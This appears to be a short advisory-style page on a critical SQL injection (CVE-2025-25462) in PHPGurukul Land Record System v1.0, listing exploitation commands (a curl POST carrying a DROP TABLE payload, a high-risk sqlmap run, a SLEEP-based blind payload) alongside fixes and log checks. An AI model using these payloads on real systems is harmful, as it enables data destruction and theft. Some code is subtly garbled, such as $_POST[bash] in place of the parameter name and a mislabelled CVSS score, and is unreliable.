PHPGurukul Land Record System, SQL Injection, CVE-2025-25462 (Critical)

How CVE-2025-25462 Works

The vulnerability exists in `/admin/add-propertytype.php` of PHPGurukul Land Record System v1.0 due to improper sanitization of the `propertytype` parameter in POST requests. Attackers inject malicious SQL queries through this parameter, which are directly executed by the database. This allows arbitrary SQL command execution, potentially leading to data theft, authentication bypass, or full system compromise. The flaw stems from missing input validation and insecure concatenation of user-supplied data into SQL statements.

DailyCVE Form

Platform: PHPGurukul Land Record
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 03/28/2025

What Undercode Say:

Exploitation

1. Craft malicious POST request:

curl -X POST http://target.com/admin/add-propertytype.php -d "propertytype='; DROP TABLE users;--"

2. Automated SQLi tools:

sqlmap -u "http://target.com/admin/add-propertytype.php" --data="propertytype=test" --risk=3 --level=5

3. Blind SQLi detection:

propertytype=test' AND (SELECT 1 FROM (SELECT SLEEP(5))x)--

Protection

1. Input sanitization:

$propertytype = mysqli_real_escape_string($conn, $_POST[bash]);

2. Prepared statements:

$stmt = $conn->prepare("INSERT INTO property_types (type) VALUES (?)");
$stmt->bind_param("s", $_POST[bash]);

3. WAF rules:

location /admin/ {
deny all;
}

4. Patch verification:

grep -r "mysql_query" /var/www/html/

Analytics

  • CVSS 4.0: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
  • Exploitability: Remote, unauthenticated
  • Attack vector: HTTP POST request
  • Mitigation: Disable `/admin/add-propertytype.php` if unused.

Detection

grep -l "propertytype" /var/www/html/admin/.php

Log analysis

tail -f /var/log/apache2/access.log | grep 'POST /admin/add-propertytype.php'

References:

Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-25462
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top